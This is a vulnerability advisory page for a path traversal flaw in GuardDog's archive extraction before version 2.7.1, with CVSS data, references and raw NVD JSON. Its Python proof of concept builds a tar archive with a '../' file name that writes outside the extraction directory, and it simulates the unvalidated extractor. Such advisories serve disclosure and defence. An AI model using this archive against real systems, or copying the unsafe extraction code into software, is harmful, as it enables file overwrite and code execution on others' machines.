CVE-2026-22871

Description

GuardDog is a CLI tool to identify malicious PyPI packages. Prior to 2.7.1, there is a path traversal vulnerability exists in GuardDog's safe_extract() function that allows malicious PyPI packages to write arbitrary files outside the intended extraction directory, leading to Arbitrary File Overwrite and Remote Code Execution on systems running GuardDog. This vulnerability is fixed in 2.7.1.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:datadoghq:guarddog:*:*:*:*:*:python:*:* - VULNERABLE

GuardDog < 2.7.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import tarfile
import os

# Create malicious PyPI package with path traversal
def create_malicious_pypi():
    # Create a malicious tar.gz file with path traversal
    malicious_filename = '../../../../../../../tmp/pwned_by_guarddog_bypass'
    
    with tarfile.open('malicious_package-1.0.0.tar.gz', 'w:gz') as tar:
        # Add a file with path traversal in its name
        info = tarfile.TarInfo(name=malicious_filename)
        info.size = len(b'GuardDog Path Traversal Exploit Success!')
        tar.addfile(info, io.BytesIO(b'GuardDog Path Traversal Exploit Success!'))
        
        # Also add legitimate-looking package files
        setup_info = tarfile.TarInfo(name='malicious_package-1.0.0/setup.py')
        setup_content = b'# Malicious package\nprint("This is a malicious package")'
        setup_info.size = len(setup_content)
        tar.addfile(setup_info, io.BytesIO(setup_content))
    
    print('[+] Created malicious PyPI package: malicious_package-1.0.0.tar.gz')

# Simulate GuardDog vulnerable safe_extract() behavior
def vulnerable_extract(tar_path, dest_dir):
    """
    Simulates the vulnerable safe_extract() function in GuardDog < 2.7.1
    Does not sanitize paths containing '../' sequences
    """
    with tarfile.open(tar_path, 'r:gz') as tar:
        for member in tar.getmembers():
            # VULNERABLE: No path validation
            target_path = os.path.join(dest_dir, member.name)
            tar.extract(member, dest_dir)
            print(f'[+] Extracted to: {os.path.abspath(target_path)}')

if __name__ == '__main__':
    import io
    create_malicious_pypi()
    
    # Simulate GuardDog scanning the malicious package
    print('\n[~] Simulating GuardDog scanning...')
    vulnerable_extract('malicious_package-1.0.0.tar.gz', '/tmp/guarddog_scan')
    print('\n[!] Check /tmp/pwned_by_guarddog_bypass for successful exploitation')

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-22871
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-22871
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-22871/
[4] VulDB https://vuldb.com/cve/CVE-2026-22871
[5] https://github.com/DataDog/guarddog/commit/9aa6a725b2c71d537d3c18d1c15621395ebb879c
[6] https://github.com/DataDog/guarddog/security/advisories/GHSA-xg9w-vg3g-6m68

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-22871", "sourceIdentifier": "[email protected]", "published": "2026-01-13T21:15:55.210", "lastModified": "2026-01-21T18:46:57.057", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "GuardDog is a CLI tool to identify malicious PyPI packages. Prior to 2.7.1, there is a path traversal vulnerability exists in GuardDog's safe_extract() function that allows malicious PyPI packages to write arbitrary files outside the intended extraction directory, leading to Arbitrary File Overwrite and Remote Code Execution on systems running GuardDog. This vulnerability is fixed in 2.7.1."}, {"lang": "es", "value": "GuardDog es una herramienta CLI para identificar paquetes PyPI maliciosos. Antes de la versión 2.7.1, existe una vulnerabilidad de salto de ruta en la función safe_extract() de GuardDog que permite a paquetes PyPI maliciosos escribir archivos arbitrarios fuera del directorio de extracción previsto, lo que lleva a una Sobreescritura de Archivos Arbitrarios y Ejecución Remota de Código en sistemas que ejecutan GuardDog. Esta vulnerabilidad está corregida en la versión 2.7.1."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:datadoghq:guarddog:*:*:*:*:*:python:*:*", "versionEndExcluding": "2.7.1", "matchCriteriaId": "872A0822-90B4-4E21-985F-788BE44CA582"}]}]}], "references": [{"url": "https://github.com/DataDog/guarddog/commit/9aa6a725b2c71d537d3c18d1c15621395ebb879c", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/DataDog/guarddog/security/advisories/GHSA-xg9w-vg3g-6m68", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}